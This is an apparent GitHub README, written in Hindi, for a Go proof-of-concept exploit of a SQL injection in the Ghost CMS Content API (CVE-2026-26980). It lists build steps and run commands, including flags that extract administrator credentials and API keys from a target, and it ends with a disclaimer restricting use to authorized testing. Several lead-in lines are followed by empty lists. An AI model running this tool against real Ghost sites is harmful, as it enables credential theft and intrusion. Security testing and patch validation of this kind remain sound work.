
Ghost CMS Content API SQL इंजेक्शन (CVE-2026-26980) के लिए Go-आधारित PoC। यह कमजोरी की पुष्टि करता है, व्यवस्थापक क्रेडेंशियल्स और API रहस्य निकालता है, तथा प्रभावित संस्करणों 3.24.0–6.19.0 पर पैच को मान्य करता है।
इस रिपॉजिटरी में CVE-2026-26980 द्वारा वर्णित Ghost CMS Content API SQL इंजेक्शन कमजोरी को प्रदर्शित करने और मान्य करने के लिए एक Go-आधारित प्रूफ-ऑफ-कॉन्सेप्ट टूल शामिल है। कार्यान्वयन मुख्य Go स्रोत फ़ाइल में लागू किए गए शोषण प्रवाह पर आधारित है और केवल अधिकृत सुरक्षा अनुसंधान और परीक्षण के लिए है।
PoC Ghost CMS इंस्टेंस को लक्षित करता है जो Content API slug फ़िल्टर ऑर्डरिंग कमजोरी से प्रभावित हैं। यह निम्न कार्य कर सकता है:
कार्यान्वयन विशेष रूप से निम्नलिखित सलाहकार संदर्भ के विरुद्ध संदर्भित है:
git clone https://github.com/gagaltotal/CVE-2026-26980-Ghost-CMS-Api
cd CVE-2026-26980-Ghost-CMS-Api
go mod init CVE-2026-26980-Ghost-CMS-Api
go mod tidy
परियोजना रूट से, बाइनरी बनाएँ इस प्रकार:
go build -o ghost-sqli ghost_sqli_cms.go
OR
go run ghost_sqli_cms.go


./ghost-sqli --help

./ghost-sqli --url http://target.example:2368
./ghost-sqli --url http://target.example:2368 --extract-password --extract-api-key
./ghost-sqli --url http://target.example:2368 --validate-fix
./ghost-sqli --url http://target.example:2368 --content-key "your-content-api-key"
./ghost-sqli --url http://target.example:2368 -v
यह परियोजना केवल शैक्षिक और अधिकृत सुरक्षा मूल्यांकन उद्देश्यों के लिए प्रदान की गई है। इसका उपयोग केवल उन प्रणालियों के विरुद्ध करें जिनके आप मालिक हैं, परीक्षण करने के लिए अधिकृत हैं, या नियंत्रित वातावरण में मूल्यांकन कर रहे हैं। तीसरे पक्ष की प्रणालियों तक अनधिकृत पहुंच या शोषण अवैध है और लागू कानूनों का उल्लंघन कर सकता है।